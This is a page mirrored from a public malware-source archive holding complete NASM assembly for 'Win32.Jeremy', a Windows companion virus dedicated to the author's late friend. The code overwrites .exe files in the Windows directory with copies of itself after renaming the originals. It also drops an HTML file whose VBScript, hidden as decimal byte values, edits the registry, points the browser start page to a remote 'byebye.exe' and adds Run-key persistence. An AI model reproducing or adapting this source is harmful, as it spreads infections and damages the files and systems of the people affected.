mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
355 lines
11 KiB
NASM
355 lines
11 KiB
NASM
|
|
Contribution - Win32.Jeremy [by Necronomikon]
|
|
|
|
|
|
|
|
;********************************
|
|
;******** Win32.Jeremy **********
|
|
;(c)by Necronomikon /ZeroGravity
|
|
;********************************
|
|
;Written for one of my real friends who,died through an car accident..... :(
|
|
;
|
|
;In memories for:
|
|
;-----------------
|
|
;Jeremy Stephan Garcia
|
|
;* 17.05.1984
|
|
;+ 08.04.2004
|
|
|
|
.586p
|
|
.model flat
|
|
JUMPS
|
|
|
|
.data
|
|
|
|
handle1 db 50 dup(0)
|
|
handle2 db 50 dup(0)
|
|
maska db '*.exe',0
|
|
zgrext db 'dat.',0
|
|
handle_ dd 0
|
|
_handle dd 0
|
|
filedta:
|
|
FileAttributes dd 0
|
|
CreationTime db 8 dup(0)
|
|
LastAccessTime db 8 dup(0)
|
|
LastWriteTime db 8 dup(0)
|
|
nFileSizeHigh dd 0
|
|
nFileSizeLow dd 0
|
|
dwReserved0 dd 0
|
|
dwReserved1 dd 0
|
|
nFileName db 50 dup('N')
|
|
nAltFileName db 14 dup(0)
|
|
newfilename db 50 dup(0)
|
|
path2 db 25 dup(0)
|
|
path3 db 260 dup(0)
|
|
|
|
|
|
szTitle db "*** Win32.Jeremy ***",0
|
|
szMessage db "*****************************************************************************",13,10
|
|
db "**Written for one of my friends,who died through an car accident**",13,10
|
|
db "*****************************************************************************",13,10
|
|
db "** (c) by Necronomikon / ZeroGravity **",13,10
|
|
db "*****************************************************************************",0
|
|
|
|
|
|
;dropme
|
|
htm_handle dd ?
|
|
htmdropper db '\jeremy.htm', 0
|
|
szhtm db 220 dup (0)
|
|
|
|
htm_ db 60,104,116,109,108,62,13,10,13,10,60,98,111,100,121,32
|
|
db 98,103,99,111,108,111,114,61,34,98,108,97,99,107,34,32
|
|
db 108,105,110,107,61,34,35,48,48,48,48,48,48,34,32,118
|
|
db 108,105,110,107,61,34,35,48,48,48,48,48,48,34,32,97
|
|
db 108,105,110,107,61,34,35,102,102,48,48,48,48,34,32,116
|
|
db 101,120,116,61,108,105,109,101,62,13,10,60,99,101,110,116
|
|
db 101,114,62,13,10,60,98,114,62,13,10,60,102,111,110,116
|
|
db 32,115,105,122,101,61,43,50,62,60,117,62,60,98,62,60
|
|
db 102,111,110,116,32,99,111,108,111,114,61,34,35,48,48,56
|
|
db 48,70,70,34,62,87,60,47,102,111,110,116,62,60,102,111
|
|
db 110,116,32,99,111,108,111,114,61,34,35,48,48,56,67,69
|
|
db 56,34,62,105,60,47,102,111,110,116,62,60,102,111,110,116
|
|
db 32,99,111,108,111,114,61,34,35,48,48,57,55,68,49,34
|
|
db 62,110,60,47,102,111,110,116,62,60,102,111,110,116,32,99
|
|
db 111,108,111,114,61,34,35,48,48,65,51,66,57,34,62,51
|
|
db 60,47,102,111,110,116,62,60,102,111,110,116,32,99,111,108
|
|
db 111,114,61,34,35,48,48,65,69,65,50,34,62,50,60,47
|
|
db 102,111,110,116,62,60,102,111,110,116,32,99,111,108,111,114
|
|
db 61,34,35,48,48,66,65,56,66,34,62,46,60,47,102,111
|
|
db 110,116,62,60,102,111,110,116,32,99,111,108,111,114,61,34
|
|
db 35,48,48,67,53,55,52,34,62,74,60,47,102,111,110,116
|
|
db 62,60,102,111,110,116,32,99,111,108,111,114,61,34,35,48
|
|
db 48,68,49,53,68,34,62,101,60,47,102,111,110,116,62,60
|
|
db 102,111,110,116,32,99,111,108,111,114,61,34,35,48,48,68
|
|
db 67,52,54,34,62,114,60,47,102,111,110,116,62,60,102,111
|
|
db 110,116,32,99,111,108,111,114,61,34,35,48,48,69,56,50
|
|
db 69,34,62,101,60,47,102,111,110,116,62,60,102,111,110,116
|
|
db 32,99,111,108,111,114,61,34,35,48,48,70,51,49,55,34
|
|
db 62,109,60,47,102,111,110,116,62,60,102,111,110,116,32,99
|
|
db 111,108,111,114,61,34,35,48,48,70,70,48,48,34,62,121
|
|
db 60,47,102,111,110,116,62,60,47,102,111,110,116,62,60,47
|
|
db 117,62,60,98,114,62,60,98,114,62,60,98,114,62,13,10
|
|
db 60,116,105,116,108,101,62,46,46,46,97,110,100,32,111,110
|
|
db 99,101,32,97,103,97,105,110,32,111,110,101,32,111,102,32
|
|
db 109,121,32,112,97,108,115,46,46,46,33,63,60,47,116,105
|
|
db 116,108,101,62,13,10,60,102,111,110,116,32,115,105,122,101
|
|
db 61,45,49,32,99,111,108,111,114,61,119,104,105,116,101,62
|
|
db 43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,60
|
|
db 98,114,62,60,98,114,62,13,10,87,114,105,116,116,101,110
|
|
db 32,102,111,114,32,111,110,101,32,111,102,32,109,121,32,102
|
|
db 114,105,101,110,100,115,32,119,104,111,32,100,105,101,100,32
|
|
db 116,104,114,111,117,103,104,32,97,110,32,99,97,114,32,97
|
|
db 99,99,105,100,101,110,116,13,10,60,98,114,62,60,98,114
|
|
db 62,13,10,40,99,41,111,100,101,100,32,105,110,32,71,101
|
|
db 114,109,97,110,89,32,50,111,111,52,60,98,114,62,60,98
|
|
db 114,62,98,121,32,78,101,99,114,111,110,111,109,105,107,111
|
|
db 110,47,90,101,114,111,71,114,97,118,105,116,121,60,98,114
|
|
db 62,13,10,60,98,114,62,60,98,114,62,60,47,102,111,110
|
|
db 116,62,13,10,60,83,99,114,105,112,116,32,76,97,110,103
|
|
db 117,97,103,101,61,118,98,115,62,13,10,114,101,109,32,119
|
|
db 105,110,51,50,46,106,101,114,101,109,121,13,10,114,101,109
|
|
db 32,40,99,41,32,98,121,32,78,101,99,114,111,110,111,109
|
|
db 105,107,111,110,47,90,71,13,10,83,101,116,32,100,111,119
|
|
db 110,108,111,97,100,101,114,32,61,32,67,114,101,97,116,101
|
|
db 79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46
|
|
db 83,104,101,108,108,34,41,13,10,100,111,119,110,108,111,97
|
|
db 100,101,114,46,114,101,103,119,114,105,116,101,32,34,72,75
|
|
db 67,85,92,115,111,102,116,119,97,114,101,92,119,105,110,51
|
|
db 50,74,101,114,101,109,121,92,34,44,32,34,40,99,41,98
|
|
db 121,32,78,101,99,114,111,110,111,109,105,107,111,110,47,90
|
|
db 101,114,111,71,114,97,118,105,116,121,34,13,10,83,101,116
|
|
db 32,74,101,114,101,109,121,61,32,67,114,101,97,116,101,111
|
|
db 98,106,101,99,116,40,34,115,99,114,105,112,116,105,110,103
|
|
db 46,102,105,108,101,115,121,115,116,101,109,111,98,106,101,99
|
|
db 116,34,41,13,10,74,101,114,101,109,121,46,99,111,112,121
|
|
db 102,105,108,101,32,119,115,99,114,105,112,116,46,115,99,114
|
|
db 105,112,116,102,117,108,108,110,97,109,101,44,74,101,114,101
|
|
db 109,121,46,71,101,116,83,112,101,99,105,97,108,70,111,108
|
|
db 100,101,114,40,48,41,38,95,13,10,34,92,106,101,114,101
|
|
db 109,121,46,118,98,115,34,13,10,90,71,114,97,118,105,116
|
|
db 121,61,32,34,34,13,10,90,71,114,97,118,105,116,121,61
|
|
db 32,100,111,119,110,108,111,97,100,101,114,46,114,101,103,114
|
|
db 101,97,100,40,34,72,75,67,85,92,83,111,102,116,119,97
|
|
db 114,101,92,77,105,99,114,111,115,111,102,116,92,73,110,116
|
|
db 101,114,110,101,116,32,69,120,112,108,111,114,101,114,92,68
|
|
db 111,119,110,108,111,97,100,32,68,105,114,101,99,116,111,114
|
|
db 121,34,41,13,10,73,102,32,40,90,71,114,97,118,105,116
|
|
db 121,61,32,34,34,41,32,84,104,101,110,13,10,90,71,114
|
|
db 97,118,105,116,121,32,61,32,34,99,58,34,13,10,69,110
|
|
db 100,32,73,102,13,10,73,102,32,82,105,103,104,116,40,90
|
|
db 71,114,97,118,105,116,121,44,32,49,41,32,61,32,34,32
|
|
db 92,32,34,32,84,104,101,110,32,90,71,114,97,118,105,116
|
|
db 121,32,61,32,77,105,100,40,90,71,114,97,118,105,116,121
|
|
db 44,32,49,44,32,76,101,110,40,90,71,114,97,118,105,116
|
|
db 121,41,32,45,32,49,41,13,10,73,102,32,78,111,116,32
|
|
db 40,74,101,114,101,109,121,46,102,105,108,101,101,120,105,115
|
|
db 116,115,40,74,101,114,101,109,121,46,103,101,116,115,112,101
|
|
db 99,105,97,108,102,111,108,100,101,114,40,48,41,32,38,32
|
|
db 34,92,98,121,101,98,121,101,46,101,120,101,34,41,41,32
|
|
db 84,104,101,110,13,10,73,102,32,78,111,116,32,40,74,101
|
|
db 114,101,109,121,46,102,105,108,101,101,120,105,115,116,115,40
|
|
db 90,71,114,97,118,105,116,121,32,38,32,34,92,98,121,101
|
|
db 98,121,101,46,101,120,101,34,41,41,32,84,104,101,110,13
|
|
db 10,100,111,119,110,108,111,97,100,101,114,46,114,101,103,119
|
|
db 114,105,116,101,32,34,72,75,67,85,92,83,111,102,116,119
|
|
db 97,114,101,92,77,105,99,114,111,115,111,102,116,92,73,110
|
|
db 116,101,114,110,101,116,32,69,120,112,108,111,114,101,114,92
|
|
db 77,97,105,110,92,83,116,97,114,116,32,80,97,103,101,34
|
|
db 44,95,13,10,34,104,116,116,112,58,47,47,119,105,110,51
|
|
db 50,106,101,114,101,109,121,46,116,114,105,112,111,100,46,99
|
|
db 111,109,47,98,121,101,98,121,101,46,101,120,101,34,13,10
|
|
db 100,111,119,110,108,111,97,100,101,114,46,114,101,103,119,114
|
|
db 105,116,101,32,34,72,75,69,89,95,67,85,82,82,69,78
|
|
db 84,95,85,83,69,82,92,83,111,102,116,119,97,114,101,92
|
|
db 77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119
|
|
db 115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110
|
|
db 92,82,85,78,34,44,95,13,10,74,101,114,101,109,121,46
|
|
db 103,101,116,115,112,101,99,105,97,108,102,111,108,100,101,114
|
|
db 40,48,41,32,38,32,34,92,98,121,101,98,121,101,46,101
|
|
db 120,101,34,13,10,69,108,115,101,13,10,100,111,119,110,108
|
|
db 111,97,100,101,114,46,114,101,103,119,114,105,116,101,32,34
|
|
db 72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69
|
|
db 82,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111
|
|
db 115,111,102,116,92,73,110,116,101,114,110,101,116,32,69,120
|
|
db 112,108,111,114,101,114,92,77,97,105,110,92,83,116,97,114
|
|
db 116,32,80,97,103,101,34,44,95,13,10,34,97,98,111,117
|
|
db 116,58,98,108,97,110,107,34,13,10,74,101,114,101,109,121
|
|
db 46,99,111,112,121,102,105,108,101,32,90,71,114,97,118,105
|
|
db 116,121,32,38,32,34,92,98,121,101,98,121,101,46,101,120
|
|
db 101,34,44,95,13,10,74,101,114,101,109,121,46,103,101,116
|
|
db 115,112,101,99,105,97,108,102,111,108,100,101,114,40,48,41
|
|
db 32,38,32,34,92,98,121,101,98,121,101,46,101,120,101,34
|
|
db 13,10,100,111,119,110,108,111,97,100,101,114,46,114,117,110
|
|
db 32,74,101,114,101,109,121,46,103,101,116,115,112,101,99,105
|
|
db 97,108,102,111,108,100,101,114,40,48,41,32,38,32,34,92
|
|
db 98,121,101,98,121,101,46,101,120,101,34,44,32,49,44,32
|
|
db 70,97,108,115,101,13,10,101,110,100,32,105,102,13,10,60
|
|
db 47,115,99,114,105,112,116,62,13,10,60,47,66,79,68,89
|
|
db 62,13,10,60,47,104,116,109,108,62,13,10,13,10,0
|
|
|
|
|
|
|
|
script_size2 equ $-htm_
|
|
|
|
_off_ equ 2722d
|
|
include useful.inc
|
|
|
|
.code
|
|
|
|
api macro a
|
|
extrn a:proc
|
|
call a
|
|
endm
|
|
|
|
jeremy:
|
|
|
|
push 00000000h ; Parameters for MessageBoxA
|
|
push offset szTitle
|
|
push offset szMessage
|
|
push 00000000h
|
|
api MessageBoxA
|
|
|
|
real:
|
|
push 00000001
|
|
push offset nFileName
|
|
api WinExec
|
|
|
|
push offset path3
|
|
push 260
|
|
api GetCurrentDirectoryA
|
|
|
|
push 25
|
|
push offset path2
|
|
api GetWindowsDirectoryA
|
|
|
|
push offset path2
|
|
api SetCurrentDirectoryA
|
|
|
|
push offset handle1
|
|
api GetModuleHandleA
|
|
|
|
push 50
|
|
push offset handle2
|
|
push eax
|
|
api GetModuleFileNameA
|
|
|
|
push offset filedta
|
|
push offset maska
|
|
api FindFirstFileA
|
|
|
|
mov dword ptr [handle_],eax
|
|
cmp eax, 0
|
|
je @@dropfile ; <-------------
|
|
|
|
check:
|
|
mov bx, word ptr[nFileName]
|
|
cmp bx, 'J'
|
|
je nextfile
|
|
cmp bx, 'E'
|
|
je nextfile
|
|
cmp bx, 'R'
|
|
je nextfile
|
|
cmp bx, 'E'
|
|
je nextfile
|
|
cmp bx, 'M'
|
|
je nextfile
|
|
cmp bx, 'Y'
|
|
je nextfile
|
|
|
|
lea esi, [nFileName]
|
|
lea edi, [newfilename]
|
|
|
|
stowit:
|
|
lodsb
|
|
cmp al, '.'
|
|
je addext
|
|
stosb
|
|
jmp stowit
|
|
|
|
addext:
|
|
stosb
|
|
lea esi, [zgrext]
|
|
movsw
|
|
movsw
|
|
push 0
|
|
push offset newfilename
|
|
push offset nFileName
|
|
api MoveFileA
|
|
;api lstrcat
|
|
push 0
|
|
push offset nFileName
|
|
push offset handle2
|
|
api CopyFileA
|
|
|
|
push 2
|
|
push offset nFileName
|
|
api CreateFileA
|
|
|
|
mov dword ptr [_handle],eax
|
|
|
|
push dword 0
|
|
push 0
|
|
push _off_
|
|
push eax
|
|
api SetFilePointer
|
|
|
|
mov eax, dword ptr [_handle]
|
|
|
|
push 50
|
|
push offset newfilename
|
|
push eax
|
|
api WriteFile
|
|
|
|
push eax
|
|
api _lclose
|
|
jmp nextfile
|
|
je real
|
|
|
|
@@dropfile:
|
|
push 50
|
|
push offset szhtm
|
|
api GetWindowsDirectoryA
|
|
|
|
push offset htmdropper
|
|
push offset szhtm
|
|
api lstrcat
|
|
|
|
push 0
|
|
push offset szhtm
|
|
api _lcreat
|
|
mov [htm_handle],eax
|
|
|
|
push script_size2
|
|
push offset htm_
|
|
push [htm_handle]
|
|
api _lwrite
|
|
|
|
push [htm_handle]
|
|
api _lclose
|
|
|
|
push 0
|
|
push edi
|
|
api WinExec
|
|
|
|
|
|
nextfile:
|
|
|
|
push offset filedta
|
|
mov eax, dword ptr [handle_]
|
|
push eax
|
|
api FindNextFileA
|
|
cmp eax, 0
|
|
je @@dropfile ; <-----------------
|
|
jmp check
|
|
|
|
|
|
bailout:
|
|
push 0
|
|
api ExitProcess
|
|
|
|
end jeremy
|
|
|
|
|
|
|
|
|
|
|